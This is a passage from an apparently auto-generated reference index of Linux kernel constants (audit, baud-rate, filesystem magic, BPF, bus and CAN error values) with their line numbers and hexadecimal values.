0x51d constant AUDIT_EXIT (line 271) | AUDIT_EXIT = 0x67 constant AUDIT_FAIL_PANIC (line 272) | AUDIT_FAIL_PANIC = 0x2 constant AUDIT_FAIL_PRINTK (line 273) | AUDIT_FAIL_PRINTK = 0x1 constant AUDIT_FAIL_SILENT (line 274) | AUDIT_FAIL_SILENT = 0x0 constant AUDIT_FANOTIFY (line 275) | AUDIT_FANOTIFY = 0x533 constant AUDIT_FD_PAIR (line 276) | AUDIT_FD_PAIR = 0x525 constant AUDIT_FEATURE_BITMAP_ALL (line 277) | AUDIT_FEATURE_BITMAP_ALL = 0x7f constant AUDIT_FEATURE_BITMAP_BACKLOG_LIMIT (line 278) | AUDIT_FEATURE_BITMAP_BACKLOG_LIMIT = 0x1 constant AUDIT_FEATURE_BITMAP_BACKLOG_WAIT_TIME (line 279) | AUDIT_FEATURE_BITMAP_BACKLOG_WAIT_TIME = 0x2 constant AUDIT_FEATURE_BITMAP_EXCLUDE_EXTEND (line 280) | AUDIT_FEATURE_BITMAP_EXCLUDE_EXTEND = 0x8 constant AUDIT_FEATURE_BITMAP_EXECUTABLE_PATH (line 281) | AUDIT_FEATURE_BITMAP_EXECUTABLE_PATH = 0x4 constant AUDIT_FEATURE_BITMAP_FILTER_FS (line 282) | AUDIT_FEATURE_BITMAP_FILTER_FS = 0x40 constant AUDIT_FEATURE_BITMAP_LOST_RESET (line 283) | AUDIT_FEATURE_BITMAP_LOST_RESET = 0x20 constant AUDIT_FEATURE_BITMAP_SESSIONID_FILTER (line 284) | AUDIT_FEATURE_BITMAP_SESSIONID_FILTER = 0x10 constant AUDIT_FEATURE_CHANGE (line 285) | AUDIT_FEATURE_CHANGE = 0x530 constant AUDIT_FEATURE_LOGINUID_IMMUTABLE (line 286) | AUDIT_FEATURE_LOGINUID_IMMUTABLE = 0x1 constant AUDIT_FEATURE_ONLY_UNSET_LOGINUID (line 287) | AUDIT_FEATURE_ONLY_UNSET_LOGINUID = 0x0 constant AUDIT_FEATURE_VERSION (line 288) | AUDIT_FEATURE_VERSION = 0x1 constant AUDIT_FIELD_COMPARE (line 289) | AUDIT_FIELD_COMPARE = 0x6f constant AUDIT_FILETYPE (line 290) | AUDIT_FILETYPE = 0x6c constant AUDIT_FILTERKEY (line 291) | AUDIT_FILTERKEY = 0xd2 constant AUDIT_FILTER_ENTRY (line 292) | AUDIT_FILTER_ENTRY = 0x2 constant AUDIT_FILTER_EXCLUDE (line 293) | AUDIT_FILTER_EXCLUDE = 0x5 constant AUDIT_FILTER_EXIT (line 294) | AUDIT_FILTER_EXIT = 0x4 constant AUDIT_FILTER_FS (line 295) | AUDIT_FILTER_FS = 0x6 constant AUDIT_FILTER_PREPEND (line 296) | AUDIT_FILTER_PREPEND = 0x10 constant AUDIT_FILTER_TASK (line 297) | AUDIT_FILTER_TASK = 0x1 constant AUDIT_FILTER_TYPE (line 298) | AUDIT_FILTER_TYPE = 0x5 constant AUDIT_FILTER_URING_EXIT (line 299) | AUDIT_FILTER_URING_EXIT = 0x7 constant AUDIT_FILTER_USER (line 300) | AUDIT_FILTER_USER = 0x0 constant AUDIT_FILTER_WATCH (line 301) | AUDIT_FILTER_WATCH = 0x3 constant AUDIT_FIRST_KERN_ANOM_MSG (line 302) | AUDIT_FIRST_KERN_ANOM_MSG = 0x6a4 constant AUDIT_FIRST_USER_MSG (line 303) | AUDIT_FIRST_USER_MSG = 0x44c constant AUDIT_FIRST_USER_MSG2 (line 304) | AUDIT_FIRST_USER_MSG2 = 0x834 constant AUDIT_FSGID (line 305) | AUDIT_FSGID = 0x8 constant AUDIT_FSTYPE (line 306) | AUDIT_FSTYPE = 0x1a constant AUDIT_FSUID (line 307) | AUDIT_FSUID = 0x4 constant AUDIT_GET (line 308) | AUDIT_GET = 0x3e8 constant AUDIT_GET_FEATURE (line 309) | AUDIT_GET_FEATURE = 0x3fb constant AUDIT_GID (line 310) | AUDIT_GID = 0x5 constant AUDIT_GREATER_THAN (line 311) | AUDIT_GREATER_THAN = 0x20000000 constant AUDIT_GREATER_THAN_OR_EQUAL (line 312) | AUDIT_GREATER_THAN_OR_EQUAL = 0x60000000 constant AUDIT_INODE (line 313) | AUDIT_INODE = 0x66 constant AUDIT_INTEGRITY_DATA (line 314) | AUDIT_INTEGRITY_DATA = 0x708 constant AUDIT_INTEGRITY_EVM_XATTR (line 315) | AUDIT_INTEGRITY_EVM_XATTR = 0x70e constant AUDIT_INTEGRITY_HASH (line 316) | AUDIT_INTEGRITY_HASH = 0x70b constant AUDIT_INTEGRITY_METADATA (line 317) | AUDIT_INTEGRITY_METADATA = 0x709 constant AUDIT_INTEGRITY_PCR (line 318) | AUDIT_INTEGRITY_PCR = 0x70c constant AUDIT_INTEGRITY_POLICY_RULE (line 319) | AUDIT_INTEGRITY_POLICY_RULE = 0x70f constant AUDIT_INTEGRITY_RULE (line 320) | AUDIT_INTEGRITY_RULE = 0x70d constant AUDIT_INTEGRITY_STATUS (line 321) | AUDIT_INTEGRITY_STATUS = 0x70a constant AUDIT_IPC (line 322) | AUDIT_IPC = 0x517 constant AUDIT_IPC_SET_PERM (line 323) | AUDIT_IPC_SET_PERM = 0x51f constant AUDIT_KERNEL (line 324) | AUDIT_KERNEL = 0x7d0 constant AUDIT_KERNEL_OTHER (line 325) | AUDIT_KERNEL_OTHER = 0x524 constant AUDIT_KERN_MODULE (line 326) | AUDIT_KERN_MODULE = 0x532 constant AUDIT_LAST_FEATURE (line 327) | AUDIT_LAST_FEATURE = 0x1 constant AUDIT_LAST_KERN_ANOM_MSG (line 328) | AUDIT_LAST_KERN_ANOM_MSG = 0x707 constant AUDIT_LAST_USER_MSG (line 329) | AUDIT_LAST_USER_MSG = 0x4af constant AUDIT_LAST_USER_MSG2 (line 330) | AUDIT_LAST_USER_MSG2 = 0xbb7 constant AUDIT_LESS_THAN (line 331) | AUDIT_LESS_THAN = 0x10000000 constant AUDIT_LESS_THAN_OR_EQUAL (line 332) | AUDIT_LESS_THAN_OR_EQUAL = 0x50000000 constant AUDIT_LIST (line 333) | AUDIT_LIST = 0x3ea constant AUDIT_LIST_RULES (line 334) | AUDIT_LIST_RULES = 0x3f5 constant AUDIT_LOGIN (line 335) | AUDIT_LOGIN = 0x3ee constant AUDIT_LOGINUID (line 336) | AUDIT_LOGINUID = 0x9 constant AUDIT_LOGINUID_SET (line 337) | AUDIT_LOGINUID_SET = 0x18 constant AUDIT_MAC_CALIPSO_ADD (line 338) | AUDIT_MAC_CALIPSO_ADD = 0x58a constant AUDIT_MAC_CALIPSO_DEL (line 339) | AUDIT_MAC_CALIPSO_DEL = 0x58b constant AUDIT_MAC_CIPSOV4_ADD (line 340) | AUDIT_MAC_CIPSOV4_ADD = 0x57f constant AUDIT_MAC_CIPSOV4_DEL (line 341) | AUDIT_MAC_CIPSOV4_DEL = 0x580 constant AUDIT_MAC_CONFIG_CHANGE (line 342) | AUDIT_MAC_CONFIG_CHANGE = 0x57d constant AUDIT_MAC_IPSEC_ADDSA (line 343) | AUDIT_MAC_IPSEC_ADDSA = 0x583 constant AUDIT_MAC_IPSEC_ADDSPD (line 344) | AUDIT_MAC_IPSEC_ADDSPD = 0x585 constant AUDIT_MAC_IPSEC_DELSA (line 345) | AUDIT_MAC_IPSEC_DELSA = 0x584 constant AUDIT_MAC_IPSEC_DELSPD (line 346) | AUDIT_MAC_IPSEC_DELSPD = 0x586 constant AUDIT_MAC_IPSEC_EVENT (line 347) | AUDIT_MAC_IPSEC_EVENT = 0x587 constant AUDIT_MAC_MAP_ADD (line 348) | AUDIT_MAC_MAP_ADD = 0x581 constant AUDIT_MAC_MAP_DEL (line 349) | AUDIT_MAC_MAP_DEL = 0x582 constant AUDIT_MAC_POLICY_LOAD (line 350) | AUDIT_MAC_POLICY_LOAD = 0x57b constant AUDIT_MAC_STATUS (line 351) | AUDIT_MAC_STATUS = 0x57c constant AUDIT_MAC_UNLBL_ALLOW (line 352) | AUDIT_MAC_UNLBL_ALLOW = 0x57e constant AUDIT_MAC_UNLBL_STCADD (line 353) | AUDIT_MAC_UNLBL_STCADD = 0x588 constant AUDIT_MAC_UNLBL_STCDEL (line 354) | AUDIT_MAC_UNLBL_STCDEL = 0x589 constant AUDIT_MAKE_EQUIV (line 355) | AUDIT_MAKE_EQUIV = 0x3f7 constant AUDIT_MAX_FIELDS (line 356) | AUDIT_MAX_FIELDS = 0x40 constant AUDIT_MAX_FIELD_COMPARE (line 357) | AUDIT_MAX_FIELD_COMPARE = 0x19 constant AUDIT_MAX_KEY_LEN (line 358) | AUDIT_MAX_KEY_LEN = 0x100 constant AUDIT_MESSAGE_TEXT_MAX (line 359) | AUDIT_MESSAGE_TEXT_MAX = 0x2170 constant AUDIT_MMAP (line 360) | AUDIT_MMAP = 0x52b constant AUDIT_MQ_GETSETATTR (line 361) | AUDIT_MQ_GETSETATTR = 0x523 constant AUDIT_MQ_NOTIFY (line 362) | AUDIT_MQ_NOTIFY = 0x522 constant AUDIT_MQ_OPEN (line 363) | AUDIT_MQ_OPEN = 0x520 constant AUDIT_MQ_SENDRECV (line 364) | AUDIT_MQ_SENDRECV = 0x521 constant AUDIT_MSGTYPE (line 365) | AUDIT_MSGTYPE = 0xc constant AUDIT_NEGATE (line 366) | AUDIT_NEGATE = 0x80000000 constant AUDIT_NETFILTER_CFG (line 367) | AUDIT_NETFILTER_CFG = 0x52d constant AUDIT_NETFILTER_PKT (line 368) | AUDIT_NETFILTER_PKT = 0x52c constant AUDIT_NEVER (line 369) | AUDIT_NEVER = 0x0 constant AUDIT_NLGRP_MAX (line 370) | AUDIT_NLGRP_MAX = 0x1 constant AUDIT_NOT_EQUAL (line 371) | AUDIT_NOT_EQUAL = 0x30000000 constant AUDIT_NR_FILTERS (line 372) | AUDIT_NR_FILTERS = 0x8 constant AUDIT_OBJ_GID (line 373) | AUDIT_OBJ_GID = 0x6e constant AUDIT_OBJ_LEV_HIGH (line 374) | AUDIT_OBJ_LEV_HIGH = 0x17 constant AUDIT_OBJ_LEV_LOW (line 375) | AUDIT_OBJ_LEV_LOW = 0x16 constant AUDIT_OBJ_PID (line 376) | AUDIT_OBJ_PID = 0x526 constant AUDIT_OBJ_ROLE (line 377) | AUDIT_OBJ_ROLE = 0x14 constant AUDIT_OBJ_TYPE (line 378) | AUDIT_OBJ_TYPE = 0x15 constant AUDIT_OBJ_UID (line 379) | AUDIT_OBJ_UID = 0x6d constant AUDIT_OBJ_USER (line 380) | AUDIT_OBJ_USER = 0x13 constant AUDIT_OPENAT2 (line 381) | AUDIT_OPENAT2 = 0x539 constant AUDIT_OPERATORS (line 382) | AUDIT_OPERATORS = 0x78000000 constant AUDIT_PATH (line 383) | AUDIT_PATH = 0x516 constant AUDIT_PERM (line 384) | AUDIT_PERM = 0x6a constant AUDIT_PERM_ATTR (line 385) | AUDIT_PERM_ATTR = 0x8 constant AUDIT_PERM_EXEC (line 386) | AUDIT_PERM_EXEC = 0x1 constant AUDIT_PERM_READ (line 387) | AUDIT_PERM_READ = 0x4 constant AUDIT_PERM_WRITE (line 388) | AUDIT_PERM_WRITE = 0x2 constant AUDIT_PERS (line 389) | AUDIT_PERS = 0xa constant AUDIT_PID (line 390) | AUDIT_PID = 0x0 constant AUDIT_POSSIBLE (line 391) | AUDIT_POSSIBLE = 0x1 constant AUDIT_PPID (line 392) | AUDIT_PPID = 0x12 constant AUDIT_PROCTITLE (line 393) | AUDIT_PROCTITLE = 0x52f constant AUDIT_REPLACE (line 394) | AUDIT_REPLACE = 0x531 constant AUDIT_SADDR_FAM (line 395) | AUDIT_SADDR_FAM = 0x71 constant AUDIT_SECCOMP (line 396) | AUDIT_SECCOMP = 0x52e constant AUDIT_SELINUX_ERR (line 397) | AUDIT_SELINUX_ERR = 0x579 constant AUDIT_SESSIONID (line 398) | AUDIT_SESSIONID = 0x19 constant AUDIT_SET (line 399) | AUDIT_SET = 0x3e9 constant AUDIT_SET_FEATURE (line 400) | AUDIT_SET_FEATURE = 0x3fa constant AUDIT_SGID (line 401) | AUDIT_SGID = 0x7 constant AUDIT_SID_UNSET (line 402) | AUDIT_SID_UNSET = 0xffffffff constant AUDIT_SIGNAL_INFO (line 403) | AUDIT_SIGNAL_INFO = 0x3f2 constant AUDIT_SOCKADDR (line 404) | AUDIT_SOCKADDR = 0x51a constant AUDIT_SOCKETCALL (line 405) | AUDIT_SOCKETCALL = 0x518 constant AUDIT_STATUS_BACKLOG_LIMIT (line 406) | AUDIT_STATUS_BACKLOG_LIMIT = 0x10 constant AUDIT_STATUS_BACKLOG_WAIT_TIME (line 407) | AUDIT_STATUS_BACKLOG_WAIT_TIME = 0x20 constant AUDIT_STATUS_BACKLOG_WAIT_TIME_ACTUAL (line 408) | AUDIT_STATUS_BACKLOG_WAIT_TIME_ACTUAL = 0x80 constant AUDIT_STATUS_ENABLED (line 409) | AUDIT_STATUS_ENABLED = 0x1 constant AUDIT_STATUS_FAILURE (line 410) | AUDIT_STATUS_FAILURE = 0x2 constant AUDIT_STATUS_LOST (line 411) | AUDIT_STATUS_LOST = 0x40 constant AUDIT_STATUS_PID (line 412) | AUDIT_STATUS_PID = 0x4 constant AUDIT_STATUS_RATE_LIMIT (line 413) | AUDIT_STATUS_RATE_LIMIT = 0x8 constant AUDIT_SUBJ_CLR (line 414) | AUDIT_SUBJ_CLR = 0x11 constant AUDIT_SUBJ_ROLE (line 415) | AUDIT_SUBJ_ROLE = 0xe constant AUDIT_SUBJ_SEN (line 416) | AUDIT_SUBJ_SEN = 0x10 constant AUDIT_SUBJ_TYPE (line 417) | AUDIT_SUBJ_TYPE = 0xf constant AUDIT_SUBJ_USER (line 418) | AUDIT_SUBJ_USER = 0xd constant AUDIT_SUCCESS (line 419) | AUDIT_SUCCESS = 0x68 constant AUDIT_SUID (line 420) | AUDIT_SUID = 0x3 constant AUDIT_SYSCALL (line 421) | AUDIT_SYSCALL = 0x514 constant AUDIT_SYSCALL_CLASSES (line 422) | AUDIT_SYSCALL_CLASSES = 0x10 constant AUDIT_TIME_ADJNTPVAL (line 423) | AUDIT_TIME_ADJNTPVAL = 0x535 constant AUDIT_TIME_INJOFFSET (line 424) | AUDIT_TIME_INJOFFSET = 0x534 constant AUDIT_TRIM (line 425) | AUDIT_TRIM = 0x3f6 constant AUDIT_TTY (line 426) | AUDIT_TTY = 0x527 constant AUDIT_TTY_GET (line 427) | AUDIT_TTY_GET = 0x3f8 constant AUDIT_TTY_SET (line 428) | AUDIT_TTY_SET = 0x3f9 constant AUDIT_UID (line 429) | AUDIT_UID = 0x1 constant AUDIT_UID_UNSET (line 430) | AUDIT_UID_UNSET = 0xffffffff constant AUDIT_UNUSED_BITS (line 431) | AUDIT_UNUSED_BITS = 0x7fffc00 constant AUDIT_URINGOP (line 432) | AUDIT_URINGOP = 0x538 constant AUDIT_USER (line 433) | AUDIT_USER = 0x3ed constant AUDIT_USER_AVC (line 434) | AUDIT_USER_AVC = 0x453 constant AUDIT_USER_TTY (line 435) | AUDIT_USER_TTY = 0x464 constant AUDIT_VERSION_BACKLOG_LIMIT (line 436) | AUDIT_VERSION_BACKLOG_LIMIT = 0x1 constant AUDIT_VERSION_BACKLOG_WAIT_TIME (line 437) | AUDIT_VERSION_BACKLOG_WAIT_TIME = 0x2 constant AUDIT_VERSION_LATEST (line 438) | AUDIT_VERSION_LATEST = 0x7f constant AUDIT_WATCH (line 439) | AUDIT_WATCH = 0x69 constant AUDIT_WATCH_INS (line 440) | AUDIT_WATCH_INS = 0x3ef constant AUDIT_WATCH_LIST (line 441) | AUDIT_WATCH_LIST = 0x3f1 constant AUDIT_WATCH_REM (line 442) | AUDIT_WATCH_REM = 0x3f0 constant AUTOFS_SUPER_MAGIC (line 443) | AUTOFS_SUPER_MAGIC = 0x187 constant B0 (line 444) | B0 = 0x0 constant B110 (line 445) | B110 = 0x3 constant B1200 (line 446) | B1200 = 0x9 constant B134 (line 447) | B134 = 0x4 constant B150 (line 448) | B150 = 0x5 constant B1800 (line 449) | B1800 = 0xa constant B19200 (line 450) | B19200 = 0xe constant B200 (line 451) | B200 = 0x6 constant B2400 (line 452) | B2400 = 0xb constant B300 (line 453) | B300 = 0x7 constant B38400 (line 454) | B38400 = 0xf constant B4800 (line 455) | B4800 = 0xc constant B50 (line 456) | B50 = 0x1 constant B600 (line 457) | B600 = 0x8 constant B75 (line 458) | B75 = 0x2 constant B9600 (line 459) | B9600 = 0xd constant BDEVFS_MAGIC (line 460) | BDEVFS_MAGIC = 0x62646576 constant BINDERFS_SUPER_MAGIC (line 461) | BINDERFS_SUPER_MAGIC = 0x6c6f6f70 constant BINFMTFS_MAGIC (line 462) | BINFMTFS_MAGIC = 0x42494e4d constant BPF_A (line 463) | BPF_A = 0x10 constant BPF_ABS (line 464) | BPF_ABS = 0x20 constant BPF_ADD (line 465) | BPF_ADD = 0x0 constant BPF_ALU (line 466) | BPF_ALU = 0x4 constant BPF_ALU64 (line 467) | BPF_ALU64 = 0x7 constant BPF_AND (line 468) | BPF_AND = 0x50 constant BPF_ARSH (line 469) | BPF_ARSH = 0xc0 constant BPF_ATOMIC (line 470) | BPF_ATOMIC = 0xc0 constant BPF_B (line 471) | BPF_B = 0x10 constant BPF_BUILD_ID_SIZE (line 472) | BPF_BUILD_ID_SIZE = 0x14 constant BPF_CALL (line 473) | BPF_CALL = 0x80 constant BPF_CMPXCHG (line 474) | BPF_CMPXCHG = 0xf1 constant BPF_DIV (line 475) | BPF_DIV = 0x30 constant BPF_DW (line 476) | BPF_DW = 0x18 constant BPF_END (line 477) | BPF_END = 0xd0 constant BPF_EXIT (line 478) | BPF_EXIT = 0x90 constant BPF_FETCH (line 479) | BPF_FETCH = 0x1 constant BPF_FROM_BE (line 480) | BPF_FROM_BE = 0x8 constant BPF_FROM_LE (line 481) | BPF_FROM_LE = 0x0 constant BPF_FS_MAGIC (line 482) | BPF_FS_MAGIC = 0xcafe4a11 constant BPF_F_AFTER (line 483) | BPF_F_AFTER = 0x10 constant BPF_F_ALLOW_MULTI (line 484) | BPF_F_ALLOW_MULTI = 0x2 constant BPF_F_ALLOW_OVERRIDE (line 485) | BPF_F_ALLOW_OVERRIDE = 0x1 constant BPF_F_ANY_ALIGNMENT (line 486) | BPF_F_ANY_ALIGNMENT = 0x2 constant BPF_F_BEFORE (line 487) | BPF_F_BEFORE = 0x8 constant BPF_F_ID (line 488) | BPF_F_ID = 0x20 constant BPF_F_NETFILTER_IP_DEFRAG (line 489) | BPF_F_NETFILTER_IP_DEFRAG = 0x1 constant BPF_F_QUERY_EFFECTIVE (line 490) | BPF_F_QUERY_EFFECTIVE = 0x1 constant BPF_F_REPLACE (line 491) | BPF_F_REPLACE = 0x4 constant BPF_F_SLEEPABLE (line 492) | BPF_F_SLEEPABLE = 0x10 constant BPF_F_STRICT_ALIGNMENT (line 493) | BPF_F_STRICT_ALIGNMENT = 0x1 constant BPF_F_TEST_RND_HI32 (line 494) | BPF_F_TEST_RND_HI32 = 0x4 constant BPF_F_TEST_RUN_ON_CPU (line 495) | BPF_F_TEST_RUN_ON_CPU = 0x1 constant BPF_F_TEST_STATE_FREQ (line 496) | BPF_F_TEST_STATE_FREQ = 0x8 constant BPF_F_TEST_XDP_LIVE_FRAMES (line 497) | BPF_F_TEST_XDP_LIVE_FRAMES = 0x2 constant BPF_F_XDP_DEV_BOUND_ONLY (line 498) | BPF_F_XDP_DEV_BOUND_ONLY = 0x40 constant BPF_F_XDP_HAS_FRAGS (line 499) | BPF_F_XDP_HAS_FRAGS = 0x20 constant BPF_H (line 500) | BPF_H = 0x8 constant BPF_IMM (line 501) | BPF_IMM = 0x0 constant BPF_IND (line 502) | BPF_IND = 0x40 constant BPF_JA (line 503) | BPF_JA = 0x0 constant BPF_JEQ (line 504) | BPF_JEQ = 0x10 constant BPF_JGE (line 505) | BPF_JGE = 0x30 constant BPF_JGT (line 506) | BPF_JGT = 0x20 constant BPF_JLE (line 507) | BPF_JLE = 0xb0 constant BPF_JLT (line 508) | BPF_JLT = 0xa0 constant BPF_JMP (line 509) | BPF_JMP = 0x5 constant BPF_JMP32 (line 510) | BPF_JMP32 = 0x6 constant BPF_JNE (line 511) | BPF_JNE = 0x50 constant BPF_JSET (line 512) | BPF_JSET = 0x40 constant BPF_JSGE (line 513) | BPF_JSGE = 0x70 constant BPF_JSGT (line 514) | BPF_JSGT = 0x60 constant BPF_JSLE (line 515) | BPF_JSLE = 0xd0 constant BPF_JSLT (line 516) | BPF_JSLT = 0xc0 constant BPF_K (line 517) | BPF_K = 0x0 constant BPF_LD (line 518) | BPF_LD = 0x0 constant BPF_LDX (line 519) | BPF_LDX = 0x1 constant BPF_LEN (line 520) | BPF_LEN = 0x80 constant BPF_LL_OFF (line 521) | BPF_LL_OFF = -0x200000 constant BPF_LSH (line 522) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 523) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXINSNS (line 524) | BPF_MAXINSNS = 0x1000 constant BPF_MEM (line 525) | BPF_MEM = 0x60 constant BPF_MEMSX (line 526) | BPF_MEMSX = 0x80 constant BPF_MEMWORDS (line 527) | BPF_MEMWORDS = 0x10 constant BPF_MINOR_VERSION (line 528) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 529) | BPF_MISC = 0x7 constant BPF_MOD (line 530) | BPF_MOD = 0x90 constant BPF_MOV (line 531) | BPF_MOV = 0xb0 constant BPF_MSH (line 532) | BPF_MSH = 0xa0 constant BPF_MUL (line 533) | BPF_MUL = 0x20 constant BPF_NEG (line 534) | BPF_NEG = 0x80 constant BPF_NET_OFF (line 535) | BPF_NET_OFF = -0x100000 constant BPF_OBJ_NAME_LEN (line 536) | BPF_OBJ_NAME_LEN = 0x10 constant BPF_OR (line 537) | BPF_OR = 0x40 constant BPF_PSEUDO_BTF_ID (line 538) | BPF_PSEUDO_BTF_ID = 0x3 constant BPF_PSEUDO_CALL (line 539) | BPF_PSEUDO_CALL = 0x1 constant BPF_PSEUDO_FUNC (line 540) | BPF_PSEUDO_FUNC = 0x4 constant BPF_PSEUDO_KFUNC_CALL (line 541) | BPF_PSEUDO_KFUNC_CALL = 0x2 constant BPF_PSEUDO_MAP_FD (line 542) | BPF_PSEUDO_MAP_FD = 0x1 constant BPF_PSEUDO_MAP_IDX (line 543) | BPF_PSEUDO_MAP_IDX = 0x5 constant BPF_PSEUDO_MAP_IDX_VALUE (line 544) | BPF_PSEUDO_MAP_IDX_VALUE = 0x6 constant BPF_PSEUDO_MAP_VALUE (line 545) | BPF_PSEUDO_MAP_VALUE = 0x2 constant BPF_RET (line 546) | BPF_RET = 0x6 constant BPF_RSH (line 547) | BPF_RSH = 0x70 constant BPF_ST (line 548) | BPF_ST = 0x2 constant BPF_STX (line 549) | BPF_STX = 0x3 constant BPF_SUB (line 550) | BPF_SUB = 0x10 constant BPF_TAG_SIZE (line 551) | BPF_TAG_SIZE = 0x8 constant BPF_TAX (line 552) | BPF_TAX = 0x0 constant BPF_TO_BE (line 553) | BPF_TO_BE = 0x8 constant BPF_TO_LE (line 554) | BPF_TO_LE = 0x0 constant BPF_TXA (line 555) | BPF_TXA = 0x80 constant BPF_W (line 556) | BPF_W = 0x0 constant BPF_X (line 557) | BPF_X = 0x8 constant BPF_XADD (line 558) | BPF_XADD = 0xc0 constant BPF_XCHG (line 559) | BPF_XCHG = 0xe1 constant BPF_XOR (line 560) | BPF_XOR = 0xa0 constant BRKINT (line 561) | BRKINT = 0x2 constant BS0 (line 562) | BS0 = 0x0 constant BTRFS_SUPER_MAGIC (line 563) | BTRFS_SUPER_MAGIC = 0x9123683e constant BTRFS_TEST_MAGIC (line 564) | BTRFS_TEST_MAGIC = 0x73727279 constant BUS_BLUETOOTH (line 565) | BUS_BLUETOOTH = 0x5 constant BUS_HIL (line 566) | BUS_HIL = 0x4 constant BUS_USB (line 567) | BUS_USB = 0x3 constant BUS_VIRTUAL (line 568) | BUS_VIRTUAL = 0x6 constant CAN_BCM (line 569) | CAN_BCM = 0x2 constant CAN_BUS_OFF_THRESHOLD (line 570) | CAN_BUS_OFF_THRESHOLD = 0x100 constant CAN_CTRLMODE_3_SAMPLES (line 571) | CAN_CTRLMODE_3_SAMPLES = 0x4 constant CAN_CTRLMODE_BERR_REPORTING (line 572) | CAN_CTRLMODE_BERR_REPORTING = 0x10 constant CAN_CTRLMODE_CC_LEN8_DLC (line 573) | CAN_CTRLMODE_CC_LEN8_DLC = 0x100 constant CAN_CTRLMODE_FD (line 574) | CAN_CTRLMODE_FD = 0x20 constant CAN_CTRLMODE_FD_NON_ISO (line 575) | CAN_CTRLMODE_FD_NON_ISO = 0x80 constant CAN_CTRLMODE_LISTENONLY (line 576) | CAN_CTRLMODE_LISTENONLY = 0x2 constant CAN_CTRLMODE_LOOPBACK (line 577) | CAN_CTRLMODE_LOOPBACK = 0x1 constant CAN_CTRLMODE_ONE_SHOT (line 578) | CAN_CTRLMODE_ONE_SHOT = 0x8 constant CAN_CTRLMODE_PRESUME_ACK (line 579) | CAN_CTRLMODE_PRESUME_ACK = 0x40 constant CAN_CTRLMODE_TDC_AUTO (line 580) | CAN_CTRLMODE_TDC_AUTO = 0x200 constant CAN_CTRLMODE_TDC_MANUAL (line 581) | CAN_CTRLMODE_TDC_MANUAL = 0x400 constant CAN_EFF_FLAG (line 582) | CAN_EFF_FLAG = 0x80000000 constant CAN_EFF_ID_BITS (line 583) | CAN_EFF_ID_BITS = 0x1d constant CAN_EFF_MASK (line 584) | CAN_EFF_MASK = 0x1fffffff constant CAN_ERROR_PASSIVE_THRESHOLD (line 585) | CAN_ERROR_PASSIVE_THRESHOLD = 0x80 constant CAN_ERROR_WARNING_THRESHOLD (line 586) | CAN_ERROR_WARNING_THRESHOLD = 0x60 constant CAN_ERR_ACK (line 587) | CAN_ERR_ACK = 0x20 constant CAN_ERR_BUSERROR (line 588) | CAN_ERR_BUSERROR = 0x80 constant CAN_ERR_BUSOFF (line 589) | CAN_ERR_BUSOFF = 0x40 constant CAN_ERR_CNT (line 590) | CAN_ERR_CNT = 0x200 constant CAN_ERR_CRTL (line 591) | CAN_ERR_CRTL = 0x4 constant CAN_ERR_CRTL_ACTIVE (line 592) | CAN_ERR_CRTL_ACTIVE = 0x40 constant CAN_ERR_CRTL_RX_OVERFLOW (line 593) | CAN_ERR_CRTL_RX_OVERFLOW = 0x1 constant CAN_ERR_CRTL_RX_PASSIVE (line 594) | CAN_ERR_CRTL_RX_PASSIVE = 0x10 constant CAN_ERR_CRTL_RX_WARNING (line 595) | CAN_ERR_CRTL_RX_WARNING = 0x4 constant CAN_ERR_CRTL_TX_OVERFLOW (line 596) | CAN_ERR_CRTL_TX_OVERFLOW = 0x2 constant CAN_ERR_CRTL_TX_PASSIVE (line 597) | CAN_ERR_CRTL_TX_PASSIVE = 0x20 constant CAN_ERR_CRTL_TX_WARNING (line 598) | CAN_ERR_CRTL_TX_WARNING = 0x8 constant CAN_ERR_CRTL_UNSPEC (line 599) | CAN_ERR_CRTL_UNSPEC = 0x0 constant CAN_ERR_DLC (line 600) | CAN_ERR_DLC = 0x8 constant CAN_ERR_FLAG (line 601) | CAN_ERR_FLAG = 0x20000000 constant CAN_ERR_LOSTARB (line 602) | CAN_ERR_LOSTARB = 0x2 constant CAN_ERR_LOSTARB_UNSPEC (line 603) | CAN_ERR_LOSTARB_UNSPEC = 0x0 constant CAN_ERR_MASK (line 604) | CAN_ERR_MASK = 0x1fffffff constant CAN_ERR_PROT (line 605) | CAN_ERR_PROT = 0x8 constant CAN_ERR_PROT_ACTIVE (line 606) | CAN_ERR_PROT_ACTIVE = 0x40 constant CAN_ERR_PROT_BIT (line 607) | CAN_ERR_PROT_BIT = 0x1 constant CAN_ERR_PROT_BIT0 (line 608) | CAN_ERR_PROT_BIT0 = 0x8 constant CAN_ERR_PROT_BIT1 (line 609) | CAN_ERR_PROT_BIT1 = 0x10 constant CAN_ERR_PROT_FORM (line 610) | CAN_ERR_PROT_FORM = 0x2 constant CAN_ERR_PROT_LOC_ACK (line 611) | CAN_ERR_PROT_LOC_ACK = 0x19 constant CAN_ERR_PROT_LOC_ACK_DEL (line 612) | CAN_ERR_PROT_LOC_ACK_DEL = 0x1b constant CAN_ERR_PROT_LOC_CRC_DEL (line 613) | CAN_ERR_PROT_LOC_CRC_DEL = 0x18 constant CAN_ERR_PROT_LOC_CRC_SEQ (line 614) | CAN_ERR_PROT_LOC_CRC_SEQ = 0x8 constant CAN_ERR_PROT_LOC_DATA (line 615) | CAN_ERR_PROT_LOC_DATA = 0xa constant CAN_ERR_PROT_LOC_DLC (line 616) | CAN_ERR_PROT_LOC_DLC = 0xb constant CAN_ERR_PROT_LOC_EOF (line 617) | CAN_ERR_PROT_LOC_EOF = 0x1a constant CAN_ERR_PROT_LOC_ID04_00 (line 618) | CAN_ERR_PROT_LOC_ID04_00 = 0xe constant CAN_ERR_PROT_LOC_ID12_05 (line 619) | CAN_ERR_PROT_LOC_ID12_05 = 0xf constant CAN_ERR_PROT_LOC_ID17_13 (line 620) | CAN_ERR_PROT_LOC_ID17_13 = 0x7 constant CAN_ERR_PROT_LOC_ID20_18 (line 621) | CAN_ERR_PROT_LOC_ID20_18 = 0x6 constant CAN_ERR_PROT_LOC_ID28_21 (line 622) | CAN_ERR_PROT_LOC_ID28_21 = 0x2 constant CAN_ERR_PROT_LOC_IDE (line 623) | CAN_ERR_PROT_LOC_IDE = 0x5 constant CAN_ERR_PROT_LOC_INTERM (line 624) | CAN_ERR_PROT_LOC_INTERM = 0x12 constant CAN_ERR_PROT_LOC_RES0 (line 625) | CAN_ERR_PROT_LOC_RES0 = 0x9 constant CAN_ERR_PROT_LOC_RES1 (line 626) | 